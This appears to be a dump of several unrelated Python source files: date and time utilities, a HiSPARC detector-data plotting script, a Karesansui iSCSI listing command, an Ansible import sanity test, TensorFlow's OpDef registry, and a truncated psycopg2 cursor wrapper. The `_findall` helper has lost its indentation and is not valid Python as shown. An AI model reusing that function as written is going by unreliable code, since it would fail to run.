    beginning_time = extract_time(pieces['hour_begin'])
    ending_time = extract_time(pieces['hour_end'])
    if not ending_time:
        # An all-zero end time means the window lasts until next midnight.
        ending_time = beginning_time + timedelta(days=1)
    elif beginning_time and ending_time and beginning_time > ending_time:
        # Window crosses midnight (e.g. 23:00-05:00).
        ending_time += timedelta(days=1)
    start_time = real_datetime.combine(today, real_time(hour=0, minute=0))
    current_range = (
        start_time + first_occasion_day + beginning_time,
        start_time + first_occasion_day + ending_time
    )
    if now > current_range[1]:
        # Today's window already passed: shift to the next occasion.
        current_range = tuple(t + next_occasion_delta for t in current_range)
    future_range = (
        current_range[0] + next_occasion_delta,
        current_range[1] + next_occasion_delta
    )
    return current_range, future_range
def guess_datetime(datetime_string):
    """
    Try to guess the datetime contained in a string of unknown format.

    @param datetime_string: the datetime representation.
    @type datetime_string: string
    @return: the guessed time.
    @rtype: L{time.struct_time}
    @raises ValueError: in case it's not possible to guess the time.
    """
    if CFG_HAS_EGENIX_DATETIME:
        try:
            return Parser.DateTimeFromString(datetime_string).timetuple()
        except ValueError:
            pass
    else:
        # The first entry is time.strptime()'s default (ctime-style) format.
        # Previously the first entry was None, which makes time.strptime()
        # raise an uncaught TypeError, and the ISO entry used the invalid
        # directives %M (minute, not month), %h, %m (month, not minute) and
        # %s, so ISO 8601 strings could never match.  Both are fixed here.
        for fmt in ('%a %b %d %H:%M:%S %Y', '%x %X', '%X %x',
                    '%Y-%m-%dT%H:%M:%SZ'):
            try:
                return time.strptime(datetime_string, fmt)
            except ValueError:
                pass
    raise ValueError("It is not possible to guess the datetime format of %s" % datetime_string)
def get_time_estimator(total):
    """
    Given a total amount of items to compute, return a function that,
    when called every time an item is computed (or every ``step`` items
    are computed), estimates how long the whole computation will take.
    The returned function yields two values: the number of seconds still
    needed to finish, and the epoch time at which the whole operation is
    expected to end.
    """
    started_at = time.time()
    done = [0]  # mutable cell instead of 'nonlocal' (Python 2 compatible)

    def estimate_needed_time(step=1):
        done[0] += step
        elapsed = time.time() - started_at
        remaining = 1.0 * elapsed / done[0] * (total - done[0])
        return remaining, remaining + started_at

    return estimate_needed_time
# This library does not support strftime's "%s" or "%y" format strings.
# Allowed if there's an even number of "%"s because they are escaped.
# The pattern matches a "%s" or "%y" directive preceded by an even number
# of "%" characters (i.e. one that is NOT escaped).  It is used by the
# strftime() replacement below to reject formats it cannot emulate for
# pre-1900 dates.
_illegal_formatting = re.compile(r"((^|[^%])(%%)*%[sy])")
def _findall(text, substr):
# Also finds overlaps
sites = []
i = 0
while 1:
j = text.find(substr, i)
if j == -1:
break
sites.append(j)
i=j+1
return sites
def strftime(fmt, dt):
    """time.strftime() replacement that also works for dates before 1900.

    *dt* may be a date/datetime or a 6+ element (y, m, d, H, M, S, ...)
    sequence.  For years >= 1900 this simply defers to time.strftime().
    For earlier years the date is shifted into an equivalent year near
    2000 (the Gregorian calendar repeats on a 28-year cycle), formatted
    there, and the original year digits are substituted back afterwards.
    "%s" and "%y" cannot be emulated this way and raise TypeError.
    """
    if not isinstance(dt, real_date):
        dt = datetime(dt[0], dt[1], dt[2], dt[3], dt[4], dt[5])
    if dt.year >= 1900:
        return time.strftime(fmt, dt.timetuple())
    illegal_formatting = _illegal_formatting.search(fmt)
    if illegal_formatting:
        # NOTE(review): the message lacks a space before the matched directive.
        raise TypeError("strftime of dates before 1900 does not handle" + illegal_formatting.group(0))
    year = dt.year
    # For every non-leap year century, advance by
    # 6 years to get into the 28-year repeat cycle
    delta = 2000 - year
    off = 6 * (delta // 100 + delta // 400)
    year = year + off
    # Move to around the year 2000
    year = year + ((2000 - year) // 28) * 28
    timetuple = dt.timetuple()
    # Format the same date in two cycle-equivalent years; positions where
    # the year digits appear in BOTH outputs are the spots that really
    # render the year (not a coincidental digit match elsewhere).
    s1 = time.strftime(fmt, (year,) + timetuple[1:])
    sites1 = _findall(s1, str(year))
    s2 = time.strftime(fmt, (year+28,) + timetuple[1:])
    sites2 = _findall(s2, str(year+28))
    sites = []
    for site in sites1:
        if site in sites2:
            sites.append(site)
    # Splice the original (pre-1900) 4-digit year back into the output.
    s = s1
    syear = "%04d" % (dt.year,)
    for site in sites:
        s = s[:site] + syear + s[site+4:]
    return s
def get_dst(date_obj):
    """Return 1 when daylight saving time is locally in effect at the
    moment described by *date_obj*, otherwise 0.  Pre-1900 dates always
    yield 0 because time.mktime() cannot represent them."""
    if date_obj.year < 1900:
        return 0
    stamp = time.mktime(date_obj.timetuple())
    # The last struct_time field returned by localtime() is tm_isdst.
    return time.localtime(stamp)[-1]
def utc_to_localtime(date_str, fmt="%Y-%m-%d %H:%M:%S", input_fmt="%Y-%m-%dT%H:%M:%SZ"):
    """Convert a UTC timestamp string to local time.

    Reference:
     - (1) http://www.openarchives.org/OAI/openarchivesprotocol.html#Dates
     - (2) http://www.w3.org/TR/NOTE-datetime

    Only dates complying with the "Complete date plus hours, minutes and
    seconds" profile of ISO 8601 defined by (2), and linked from (1), are
    supported.  Eg: 1994-11-05T13:15:30Z
    """
    parsed = datetime.strptime(date_str, input_fmt)
    # Shift from UTC into the local zone: add the local DST offset and
    # subtract the zone's standard offset from UTC (time.timezone).
    local = parsed + timedelta(hours=get_dst(parsed)) - timedelta(seconds=time.timezone)
    return strftime(fmt, local)
def localtime_to_utc(date_str, fmt="%Y-%m-%dT%H:%M:%SZ", input_fmt="%Y-%m-%d %H:%M:%S"):
    """Convert a local time string to UTC (inverse of utc_to_localtime)."""
    parsed = datetime.strptime(date_str, input_fmt)
    # Undo the local offset: drop the DST hour and add back the zone's
    # standard offset from UTC.
    utc = parsed - timedelta(hours=get_dst(parsed)) + timedelta(seconds=time.timezone)
    return strftime(fmt, utc)
def strptime(date_string, fmt):
    """Parse *date_string* according to *fmt* and return a real_datetime
    built from the year..second fields of the resulting struct_time."""
    fields = time.strptime(date_string, fmt)[:6]
    return real_datetime(*fields)
| gpl-2.0 |
laurensstoop/HiSPARC-BONZ | egg/legacy/egg_saskia_v4.2.py | 1 | 9204 | # -*- coding: utf-8 -*-
#
#################################################################################################
# #
# Program for analysing HiSPARC data #
# #
# This software is made under the GNU General Public License, version 3 (GPL-3.0) #
# #
#################################################################################################
"""
===================================
Created on Thu Mar 24 13:17:57 2016
@author: Laurens Stoop
===================================
"""
################################## HEADER ##################################
"""
Import of Packages
"""
import sapphire # The HiSparc Python Framework
import tables # A HDF5 python module that allows to store data
import datetime # A package to decode the timeformat of HiSparc data
import matplotlib.pyplot as plt # Plotting functionality of MatPlotLib
import numpy as np # This is NumPy
import os.path # To check if files exist (so you don't do stuff again)
import rootpy.plotting # Get the pythonesc version of ROOT
from rootpy.plotting import root2matplotlib
from matplotlib.colors import LogNorm
"""
Getting the data file and setting the variables
"""
# Time between which the data is downloaded (jjjj,mm,dd,[hh])
# Time window for the download; Python 2 tolerates the leading zeros here.
START = datetime.datetime(2015,01,01)
END = datetime.datetime(2016,01,01)
# Give the list of stations
STATIONS = [501,503,1006,1101,3001,13002,14001,20003]
# Do not show the figures
plt.ioff()
################################## BODY ##################################
"""
Data acquisition
"""
# Open a data file (automatic close)
with tables.open_file('egg_saskia.h5','a') as data_file:
    # Retrieve for every station the data and plot a pulsehisto
    for station in STATIONS:
        # Set the station name (this is the group name in the file)
        station_name = '/s%d' %station
        # Data is downloaded only when the station group is not yet present
        if station_name not in data_file:
            # Let them know what we do
            print "\nGetting event data from station %d " % station
            # Now retrieve the event data
            sapphire.esd.download_data(
                data_file,      # File (as opened above)
                station_name,   # Group name (/s..station..)
                station,        # Station number
                START,          # Start data date
                END,            # End data date
                'events',       # Download events (or 'weather')
                True)           # Show progress
            # Let them know what we do
            print "\nGetting wheater data from station %d " % station
            # Now retrieve the wheater data
            sapphire.esd.download_data(
                data_file,      # File (as opened above)
                station_name,   # Group name (/s..station..)
                station,        # Station number
                START,          # Start data date
                END,            # End data date
                'weather',      # Download wheater
                True)           # Show progress
        # If the datafile has the group we do not download them data
        else:
            print "All data present for station %d" % station
        ####### Pulseheight histograms #######
        # If the plot exist we skip the plotting
        # (note the 'pulseheigt' typo is part of the on-disk file name)
        if os.path.isfile('pulseheigt_histogram_%d.pdf' % station):
            # Say if the plot is present
            print "Plot already present for station %d" % station
        # If there is no plot we make it
        else:
            # Get event data
            event_data = data_file.get_node(
                station_name,   # From the group (/s..station..)
                'events')       # Get the node with events
            # Set the figure
            figure_pulse = plt.figure(station)
            # Get the pulseheight from all events
            data_pulseheight = event_data.col('pulseheights') # col takes all data from events
            # Creates bins so that the ugly shit is taken away
            bins = np.linspace(0, 4500, 201)
            # Plotting the pulseheigth for all events
            plt.hist(
                data_pulseheight,   # Plot the Pulseheight
                bins,               # Number of bins
                histtype='step',    # Make the histogram a step function
                log=True)           # With a logarithmic scale
            # Setting the plot labels and title
            plt.xlabel("Pulseheight [ADC]")
            plt.ylabel("Counts")
            plt.title("Pulseheight histogram (log scale) for station (%d)" %station)
            # Saving them Pica
            plt.savefig(
                'pulseheigt_histogram_%d.pdf' % station,    # Name of the file
                bbox_inches='tight')                        # Use less whitespace
            # Necessary to avoid multiplotting in one figure and to close memory leak
            plt.close(figure_pulse)
        ####### Pulseheight vs pulse integral histograms #######
        # If the plot exist we skip the plotting
        if os.path.isfile('pmt_saturation_s%d.pdf' %station):
            # Say if the plot is present
            print "PMT saturation histogram already present for station %d" % station
        # If there is no plot we make it
        else:
            # Get event data
            event_data = data_file.get_node(
                station_name,   # From the group (/s..station..)
                'events')       # Get the node with events
            # Get the pulseheight from all events
            data_pulseheights = event_data.col('pulseheights') # col takes all data from events (this improves the speed)
            # Get the integral from all events
            data_integrals = event_data.col('integrals') # col takes all data from events
            # Make a figure so it can be closed
            figure_combo, ((ax1, ax2), (ax3, ax4)) = plt.subplots(2, 2, sharex = 'col', sharey = 'row')
            # Setting the plot titles
            ax1.set_title('Detector 1')
            ax2.set_title('Detector 2')
            ax3.set_title('Detector 3')
            ax4.set_title('Detector 4')
            # Setting the plot labels
            ax1.set_ylabel('Pulseheight [ADC]')
            ax3.set_ylabel('Pulseheight [ADC]')
            ax3.set_xlabel('Pulse integral [ADC.ns]')
            ax4.set_xlabel('Pulse integral [ADC.ns]')
            # Now we plot the data of every detector
            for detector in range(0,4):
                # Select the detector data
                data_pulseheight_detector = data_pulseheights[:,detector]
                data_integral_detector = data_integrals[:,detector]
                # Combine the detector data
                data_combo = np.stack(
                    (data_integral_detector,    # The pulse integral on y axis
                    data_pulseheight_detector), # The pulseheight on x axis
                    axis=-1)                    # To get the direction correct
                # Initiate a 2D histogram (ROOT style)
                histogram_combo_detector = rootpy.plotting.Hist2D(100, 0, 150000, 100, 0, 4500)
                # Fill the Histogram
                histogram_combo_detector.fill_array(data_combo)
                # Plot the histogram with logarithmic colors in correct place
                if detector == 0:
                    root2matplotlib.hist2d(histogram_combo_detector, norm=LogNorm(), axes=ax1)
                elif detector == 1:
                    root2matplotlib.hist2d(histogram_combo_detector, norm=LogNorm(), axes=ax2)
                elif detector == 2:
                    root2matplotlib.hist2d(histogram_combo_detector, norm=LogNorm(), axes=ax3)
                elif detector == 3:
                    root2matplotlib.hist2d(histogram_combo_detector, norm=LogNorm(), axes=ax4)
            # Save the file
            figure_combo.savefig(
                'pmt_saturation_s%d.pdf' %station)  # Name of the file
            # Close the figure
            plt.close(figure_combo)
            # Now we go to the next detector
            # NOTE(review): the statement below is a no-op expression (it
            # computes detector + 1 and discards the result); the for-loop
            # above already advances 'detector'.  Candidate for removal.
            detector +1
print "####### I'm Done Bitches! #######"
################################## FOOTER ##################################
"""
Clean up shit
"""
| gpl-3.0 |
karesansui/karesansui | bin/get_iscsi.py | 1 | 5464 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# This file is part of Karesansui.
#
# Copyright (C) 2012 HDE, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
import os
import sys
import re
import logging
from optparse import OptionParser
from ksscommand import KssCommand, KssCommandException, KssCommandOptException
import __cmd__
try:
import karesansui
from karesansui import __version__
from karesansui.lib.utils import load_locale, execute_command
from karesansui.lib.iscsi import iscsi_parse_node, iscsi_parse_session, iscsi_print_format_node, \
iscsi_check_node_status, iscsi_check_node_autostart, iscsi_get_auth_type, iscsi_get_auth_user
from karesansui.lib.const import ISCSI_CMD, ISCSI_CMD_OPTION_MODE, \
ISCSI_CMD_OPTION_MODE_NODE, ISCSI_CMD_OPTION_MODE_SESSION, ISCSI_CMD_RES_NO_NODE, \
ISCSI_CMD_RES_NO_ACTIVE_SESSION
except ImportError, e:
print >>sys.stderr, "[Error] some packages not found. - %s" % e
sys.exit(1)
_ = load_locale()
usage = '%prog [options]'
def getopts():
    """Build the command-line parser and return the (options, args) pair."""
    parser = OptionParser(usage=usage, version=__version__)
    parser.add_option('-i', '--iqn', dest='iqn', help=_('IQN'), default=None)
    parsed = parser.parse_args()
    return parsed
def chkopts(opts):
    """Validate the parsed options.

    An IQN may only contain ASCII letters, digits and the characters
    '.', '_', ':' and '-'.  Raises KssCommandOptException when the given
    IQN contains anything else; a missing/empty IQN is accepted.
    """
    # Raw string so that '\.' is a regex escape, not a Python string escape.
    reg = re.compile(r"[^a-zA-Z0-9\._:-]")
    if opts.iqn and reg.search(opts.iqn):
        # Fixed the "Illigal" typo in the original error message.
        raise KssCommandOptException('ERROR: Illegal option value. option=%s value=%s' % ('-i or --iqn', opts.iqn))
class GetIscsi(KssCommand):
    """List iSCSI nodes with their session and autostart state.

    For every discovered node one line is written to stdout:
      "<node> <is_active> <autostart>"                  (no --iqn given)
      "<node> <is_active> <autostart> <auth> <user>"    (node matching --iqn)
    """

    def process(self):
        (opts, args) = getopts()
        chkopts(opts)
        self.up_progress(10)
        # First query: list all configured nodes (iscsiadm --mode node).
        node_command_args = (ISCSI_CMD,
                             ISCSI_CMD_OPTION_MODE,
                             ISCSI_CMD_OPTION_MODE_NODE
                             )
        (node_rc, node_res) = execute_command(node_command_args)
        if node_rc != 0:
            # A non-zero exit whose output contains the "no node" marker is
            # not an error condition: there simply are no nodes configured.
            for node_line in node_res:
                if node_line.lower().find(ISCSI_CMD_RES_NO_NODE) != -1:
                    self.logger.info("iSCSI node not found")
                    return True
            raise KssCommandException('Failed to get iSCSI node. message=%s' % (node_res))
        self.up_progress(20)
        # Second query: list currently active sessions (iscsiadm --mode session).
        session_command_args = (ISCSI_CMD,
                                ISCSI_CMD_OPTION_MODE,
                                ISCSI_CMD_OPTION_MODE_SESSION
                                )
        (session_rc, session_res) = execute_command(session_command_args)
        if session_rc != 0:
            raise KssCommandException('Failed to get iSCSI session. message=%s' % (session_res))
        self.up_progress(20)
        for node_line in node_res:
            if not node_line:
                continue
            try:
                node = iscsi_parse_node(node_line)
            except:
                # Unparsable lines are logged and skipped, not fatal.
                self.logger.warn('Failed to parse iSCSI node command response. message="%s"' % (node_line))
                continue
            # A node counts as active when any current session matches it.
            is_active = 0
            for session_line in session_res:
                if not session_line:
                    continue
                if session_line.find(ISCSI_CMD_RES_NO_ACTIVE_SESSION) != -1:
                    break
                try:
                    session = iscsi_parse_session(session_line)
                except:
                    self.logger.warn('Failed to parse iSCSI session command response. message="%s"' % (session_line))
                    continue
                if iscsi_check_node_status(node, session):
                    is_active = 1
                    break
            # NOTE(review): a truthy iscsi_check_node_autostart() maps to
            # autostart=0 -- presumably the helper reports "manual" startup;
            # confirm against karesansui.lib.iscsi before relying on this.
            if iscsi_check_node_autostart(node):
                autostart = 0
            else:
                autostart = 1
            if opts.iqn is None:
                # No filter: print a summary line for every node.
                self.logger.info("%s %s %s" % (iscsi_print_format_node(node), is_active, autostart))
                print >>sys.stdout, _("%s %s %s") % (iscsi_print_format_node(node), is_active, autostart)
            else:
                # Filtered: print the matching node with auth details and stop.
                if opts.iqn == node['iqn']:
                    auth = iscsi_get_auth_type(node)
                    user = iscsi_get_auth_user(node)
                    self.logger.info("%s %s %s %s %s" % (iscsi_print_format_node(node), is_active, autostart, auth, user))
                    print >>sys.stdout, _("%s %s %s %s %s") % (iscsi_print_format_node(node), is_active, autostart, auth, user)
                    break
        return True
if __name__ == "__main__":
    # Run the command; run() drives process() and its boolean result
    # becomes the process exit status.
    target = GetIscsi()
    sys.exit(target.run())
| mit |
felixfontein/ansible | test/lib/ansible_test/_internal/commands/sanity/import.py | 13 | 9115 | """Sanity test for proper import exception handling."""
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
from ... import types as t
from . import (
SanityMultipleVersion,
SanityMessage,
SanityFailure,
SanitySuccess,
SanitySkipped,
SANITY_ROOT,
)
from ...target import (
TestTarget,
)
from ...util import (
ANSIBLE_TEST_DATA_ROOT,
SubprocessError,
remove_tree,
display,
parse_to_list_of_dict,
is_subdir,
generate_pip_command,
find_python,
get_hash,
REMOTE_ONLY_PYTHON_VERSIONS,
)
from ...util_common import (
intercept_command,
run_command,
ResultType,
)
from ...ansible_util import (
ansible_environment,
)
from ...executor import (
generate_pip_install,
install_cryptography,
)
from ...config import (
SanityConfig,
)
from ...coverage_util import (
coverage_context,
)
from ...venv import (
create_virtual_environment,
)
from ...data import (
data_context,
)
def _get_module_test(module_restrictions):  # type: (bool) -> t.Callable[[str], bool]
    """Create a predicate which tests whether a path can be used by modules or not."""
    # Snapshot the content paths once so every predicate call is cheap.
    module_path = data_context().content.module_path
    module_utils_path = data_context().content.module_utils_path

    def is_module_path(path):  # type: (str) -> bool
        """True when the path lives under the module or module_utils tree."""
        return is_subdir(path, module_path) or is_subdir(path, module_utils_path)

    if module_restrictions:
        return is_module_path

    def is_plugin_path(path):  # type: (str) -> bool
        """True when the path lives outside the module trees."""
        return not is_module_path(path)

    return is_plugin_path
class ImportTest(SanityMultipleVersion):
    """Sanity test for proper import exception handling."""

    def filter_targets(self, targets):  # type: (t.List[TestTarget]) -> t.List[TestTarget]
        """Return the given list of test targets, filtered to include only those relevant for the test."""
        return [target for target in targets if os.path.splitext(target.path)[1] == '.py' and
                any(is_subdir(target.path, path) for path in data_context().content.plugin_paths.values())]

    def test(self, args, targets, python_version):
        """
        Run the importer against module and plugin targets in a minimal
        virtual environment and report any import-time problems found.

        :type args: SanityConfig
        :type targets: SanityTargets
        :type python_version: str
        :rtype: TestResult
        """
        settings = self.load_processor(args, python_version)
        paths = [target.path for target in targets.include]
        capture_pip = args.verbosity < 2
        python = find_python(python_version)
        if python_version.startswith('2.') and args.requirements:
            # hack to make sure that virtualenv is available under Python 2.x
            # on Python 3.x we can use the built-in venv
            pip = generate_pip_command(python)
            run_command(args, generate_pip_install(pip, '', packages=['virtualenv']), capture=capture_pip)
        env = ansible_environment(args, color=False)
        temp_root = os.path.join(ResultType.TMP.path, 'sanity', 'import')
        messages = []
        # Modules are tested against a bare environment; plugins additionally
        # get the ansible-core sanity requirements installed.
        for import_type, test, add_ansible_requirements in (
                ('module', _get_module_test(True), False),
                ('plugin', _get_module_test(False), True),
        ):
            if import_type == 'plugin' and python_version in REMOTE_ONLY_PYTHON_VERSIONS:
                continue
            data = '\n'.join([path for path in paths if test(path)])
            if not data:
                continue
            requirements_file = None
            # create a clean virtual environment to minimize the available imports beyond the python standard library
            virtual_environment_dirname = 'minimal-py%s' % python_version.replace('.', '')
            if add_ansible_requirements:
                requirements_file = os.path.join(ANSIBLE_TEST_DATA_ROOT, 'requirements', 'sanity.import-plugins.txt')
                # Hash the requirements into the venv name so it is rebuilt
                # whenever the requirements change.
                virtual_environment_dirname += '-requirements-%s' % get_hash(requirements_file)
            virtual_environment_path = os.path.join(temp_root, virtual_environment_dirname)
            virtual_environment_bin = os.path.join(virtual_environment_path, 'bin')
            remove_tree(virtual_environment_path)
            if not create_virtual_environment(args, python_version, virtual_environment_path):
                display.warning("Skipping sanity test '%s' on Python %s due to missing virtual environment support." % (self.name, python_version))
                return SanitySkipped(self.name, python_version)
            # add the importer to our virtual environment so it can be accessed through the coverage injector
            importer_path = os.path.join(virtual_environment_bin, 'importer.py')
            yaml_to_json_path = os.path.join(virtual_environment_bin, 'yaml_to_json.py')
            if not args.explain:
                os.symlink(os.path.abspath(os.path.join(SANITY_ROOT, 'import', 'importer.py')), importer_path)
                os.symlink(os.path.abspath(os.path.join(SANITY_ROOT, 'import', 'yaml_to_json.py')), yaml_to_json_path)
            # activate the virtual environment
            env['PATH'] = '%s:%s' % (virtual_environment_bin, env['PATH'])
            env.update(
                SANITY_TEMP_PATH=ResultType.TMP.path,
                SANITY_IMPORTER_TYPE=import_type,
            )
            if data_context().content.collection:
                env.update(
                    SANITY_COLLECTION_FULL_NAME=data_context().content.collection.full_name,
                    SANITY_EXTERNAL_PYTHON=python,
                )
            virtualenv_python = os.path.join(virtual_environment_bin, 'python')
            virtualenv_pip = generate_pip_command(virtualenv_python)
            # make sure requirements are installed if needed
            if requirements_file:
                install_cryptography(args, virtualenv_python, python_version, virtualenv_pip)
                run_command(args, generate_pip_install(virtualenv_pip, 'sanity', context='import-plugins'), env=env, capture=capture_pip)
            # make sure coverage is available in the virtual environment if needed
            if args.coverage:
                run_command(args, generate_pip_install(virtualenv_pip, '', packages=['setuptools']), env=env, capture=capture_pip)
                run_command(args, generate_pip_install(virtualenv_pip, '', packages=['coverage']), env=env, capture=capture_pip)
            try:
                # In some environments pkg_resources is installed as a separate pip package which needs to be removed.
                # For example, using Python 3.8 on Ubuntu 18.04 a virtualenv is created with only pip and setuptools.
                # However, a venv is created with an additional pkg-resources package which is independent of setuptools.
                # Making sure pkg-resources is removed preserves the import test consistency between venv and virtualenv.
                # Additionally, in the above example, the pyparsing package vendored with pkg-resources is out-of-date and generates deprecation warnings.
                # Thus it is important to remove pkg-resources to prevent system installed packages from generating deprecation warnings.
                run_command(args, virtualenv_pip + ['uninstall', '--disable-pip-version-check', '-y', 'pkg-resources'], env=env, capture=capture_pip)
            except SubprocessError:
                pass
            # Strip setuptools and pip themselves so imports are tested
            # against a truly minimal environment.
            run_command(args, virtualenv_pip + ['uninstall', '--disable-pip-version-check', '-y', 'setuptools'], env=env, capture=capture_pip)
            run_command(args, virtualenv_pip + ['uninstall', '--disable-pip-version-check', '-y', 'pip'], env=env, capture=capture_pip)
            display.info(import_type + ': ' + data, verbosity=4)
            cmd = ['importer.py']
            try:
                with coverage_context(args):
                    stdout, stderr = intercept_command(args, cmd, self.name, env, capture=True, data=data, python_version=python_version,
                                                       virtualenv=virtualenv_python)
                if stdout or stderr:
                    raise SubprocessError(cmd, stdout=stdout, stderr=stderr)
            except SubprocessError as ex:
                # Exit status 10 with stdout (and no stderr) is the importer's
                # "problems found" protocol; anything else is a real failure.
                if ex.status != 10 or ex.stderr or not ex.stdout:
                    raise
                pattern = r'^(?P<path>[^:]*):(?P<line>[0-9]+):(?P<column>[0-9]+): (?P<message>.*)$'
                parsed = parse_to_list_of_dict(pattern, ex.stdout)
                relative_temp_root = os.path.relpath(temp_root, data_context().content.root) + os.path.sep
                messages += [SanityMessage(
                    message=r['message'],
                    path=os.path.relpath(r['path'], relative_temp_root) if r['path'].startswith(relative_temp_root) else r['path'],
                    line=int(r['line']),
                    column=int(r['column']),
                ) for r in parsed]
        results = settings.process_errors(messages, paths)
        if results:
            return SanityFailure(self.name, messages=results, python_version=python_version)
        return SanitySuccess(self.name, python_version=python_version)
| gpl-3.0 |
gunan/tensorflow | tensorflow/python/framework/op_def_registry.py | 16 | 1842 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Global registry for OpDefs."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import threading
from tensorflow.core.framework import op_def_pb2
from tensorflow.python import _op_def_registry
# The cache amortizes ProtoBuf serialization/deserialization overhead
# on the language boundary. If an OpDef has been looked up, its Python
# representation is cached.
_cache = {}  # op name (str) -> op_def_pb2.OpDef
# Guards writes to _cache; get() reads optimistically without the lock.
_cache_lock = threading.Lock()
def get(name):
  """Returns an OpDef for a given `name` or None if the lookup fails."""
  # Optimistic lock-free read: cached values are never None, so a None
  # result here always means "not cached yet".
  op_def = _cache.get(name)
  if op_def is not None:
    return op_def
  with _cache_lock:
    # Re-check under the lock in case another thread populated the cache
    # while we were waiting.
    op_def = _cache.get(name)
    if op_def is not None:
      return op_def
    serialized_op_def = _op_def_registry.get(name)
    if serialized_op_def is None:
      return None
    op_def = op_def_pb2.OpDef()
    op_def.ParseFromString(serialized_op_def)
    _cache[name] = op_def
    return op_def
# TODO(b/141354889): Remove once there are no callers.
def sync():
"""No-op. Used to synchronize the contents of the Python registry with C++."""
| apache-2.0 |
gsrp/opengsrp | gsrp/services/cursor.py | 1 | 4564 | # --*-- coding: utf-8 --*--
import psycopg2
import psycopg2.extras
from psycopg2 import Error
from tools.translations import trlocal as _
class Cursor(object):
	"""Thin wrapper around a psycopg2 connection/cursor pair.

	Holds a single connection (``conn``) and cursor (``cr``) and offers
	execute helpers that roll back the transaction on failure, plus
	fetch variants that return rows as {column name: value} dicts.
	"""

	conn = None  # psycopg2 connection, or None when not connected
	cr = None    # psycopg2 cursor, or None when not open

	def _connect(self, dsn, database, user, password, host, port):
		"""Open (or re-open) the database connection.

		The credentials are remembered on first use so that a dropped
		connection can be re-established with the same parameters.
		Returns True once a usable connection exists.
		"""
		if self.conn:
			if self.conn.closed:
				# Reconnect with the previously stored credentials.
				self.conn = psycopg2.connect(dsn = self.dsn, database = self.database, user = self.user, password = self.password, host = self.host, port = self.port, connection_factory = psycopg2.extensions.connection)
		else:
			self.dsn = dsn
			self.database = database
			self.user = user
			self.password = password
			self.host = host
			self.port = port
			# BUG FIX: host/port were stored but not passed on the first
			# connect, so non-default hosts only worked after a reconnect.
			self.conn = psycopg2.connect(dsn = self.dsn, database = self.database, user = self.user, password = self.password, host = self.host, port = self.port, connection_factory = psycopg2.extensions.connection)
		# BUG FIX: the reconnect branch used to fall through and return
		# None, which _login() treats as a failed connection.
		return True

	def _cursor(self):
		"""Create a cursor on the current connection if one is not open."""
		if self.conn:
			if self.cr and not self.cr.closed:
				return True
			#self.cr = self.conn.cursor(cursor_factory = psycopg2.extras.NamedTupleCursor)
			self.cr = self.conn.cursor()
			return True
		return False

	def _checkLogin(self):
		"""True when both the connection and the cursor are open."""
		return self.conn and self.cr and not self.conn.closed and not self.cr.closed

	def _setAutocommit(self, val = True):
		"""Switch autocommit, remembering the previous settings so they
		can be restored by _restoreAutocommit()."""
		if self.conn and not self.conn.closed and self.cr and not self.cr.closed:
			self._isolation_level = self.conn.isolation_level
			self.conn.set_isolation_level(0)
			self._autocommit = self.conn.autocommit
			if self.conn.autocommit != val:
				self.conn.autocommit = val

	def _restoreAutocommit(self):
		"""Restore the settings saved by _setAutocommit()."""
		if self.conn and not self.conn.closed and self.cr and not self.cr.closed:
			if self.conn.autocommit != self._autocommit:
				self.conn.set_isolation_level(self._isolation_level)
				self.conn.autocommit = self._autocommit

	def _mogrify(self, query, vars):
		"""Return the query string after parameter binding (debug aid)."""
		return self.cr.mogrify(query, vars)

	def _execute(self, query, vars = None):
		"""Execute one query; roll back and re-raise on any error."""
		try:
			self.cr.execute(query = query, vars = vars)
		except Exception:
			# BUG FIX: previously called self.cr.conn._rollback(), which
			# raised AttributeError and masked the original database error.
			self._rollback()
			raise

	def _executemany(self, query, vars_list):
		"""Execute the query once per parameter tuple in vars_list."""
		# BUG FIX: previously called cr.execute(vars_list=...), which is a
		# TypeError; executemany() is the correct psycopg2 API.
		self.cr.executemany(query, vars_list)

	def _executeList(self, query_list):
		"""Execute a list of queries; each entry is either a plain SQL
		string/bytes or a (query, vars) pair.  Rolls back on failure."""
		try:
			for q in query_list:
				if type(q) in (tuple, list):
					query = q[0]
					vars = q[1]
				elif type(q) in (str, bytes):
					query = q
					vars = None
				self.cr.execute(query = query, vars = vars)
		except Exception:
			# BUG FIX: same cr.conn._rollback() AttributeError as _execute().
			self._rollback()
			raise

	def _executemanyList(self, querymany_list):
		"""Run executemany() for every (query, vars_list) pair."""
		for query, vars_list in querymany_list:
			# BUG FIX: previously used cr.execute(vars_list=...).
			self.cr.executemany(query, vars_list)

	def _commit(self):
		"""Commit if connected; True on success, False otherwise."""
		if self.conn and not self.conn.closed:
			self.conn.commit()
			return True
		else:
			return False

	def _rollback(self):
		"""Roll back if connected; True on success, False otherwise."""
		if self.conn and not self.conn.closed:
			self.conn.rollback()
			return True
		else:
			return False

	def _row_to_dict(self, row):
		"""Map one result row to {column name: value} via cr.description."""
		record = {}
		for i in range(self.cr.description.__len__()):
			record[self.cr.description[i].name] = row[i]
